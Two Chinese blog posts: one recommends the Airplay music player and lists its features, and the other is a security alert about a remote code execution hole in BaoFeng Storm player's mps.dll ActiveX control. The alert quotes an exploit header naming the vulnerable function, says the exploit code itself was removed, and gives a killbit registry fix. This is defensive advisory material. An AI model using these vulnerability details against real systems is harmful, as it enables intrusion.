      Airplay,正如它的名字一样,操作界面全部采用flash水晶界面,视觉效果非常炫;单文件软件,无需安装;体积只有几百KB;唯一的不足是CPU占用率稍高(在10%左右)。本人曾用过一段时间,音效也不错,非常值得喜欢追求个性化的用户使用。

airplay 20090524

      主要功能特点:
      水晶界面
      原生读取压缩文件(RAR/ZIP)
      原生无缝播放支持(压缩状态有效)
      支持歌词及图片预览选择
      原生支持APE、FLAC、WavPack、TAK、MP3、OGG、TTA、Musepack、AAC、WMA*、Wav*
      支持MP3、APE、OGG、WMA、Flac标签体系,支持读取内嵌CUE
      支持apl、fpl、m3u/m3u8、pls、ttbl/ttpl、asx、wpl列表格式,支持CUE(压缩状态有效)及其自动去重
      自主开发独有Pure Music纯音还原算法,还原纯净好声音,1.2版本特别增强有损格式还原
      原生支持多媒体键盘及普通键盘全局快捷键(千千静听定义)**
      自主开发独有Zion架构图形及音频引擎,图形外壳与音频核心分离设计
      可分别打开的水晶迷你主控及歌词
      多列表支持(tab和shift-tab切换列表类型)
      支持 Win2K、WinXP、Vista、Win7及Win 64位系统

      注意
      *需要WMP9以上或DShow支持,如果系统渲染链被修改可能导致WMA无法播放
      **Dell多媒体键盘音量旋钮不能生效

      最新发布版本:20090524
      MD5: d06b11a5d8c92ce1b23d678c93e83530

      点击此处下载airplay20090524

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/205

暴风影音ActiveX远程溢出漏洞及临时解决办法

暴风影音用户警惕!
#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL    :     mps.dll
# Problem Func   :   OnBeforeVideoDownload()

HTML代码
由于受到clean-mx.de警告,溢出代码已删除。

临时解决办法:
建议用户通过注册表对相应的CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05设置Killbit

或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB}]
“Compatibility Flags”=dword:00000400

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/230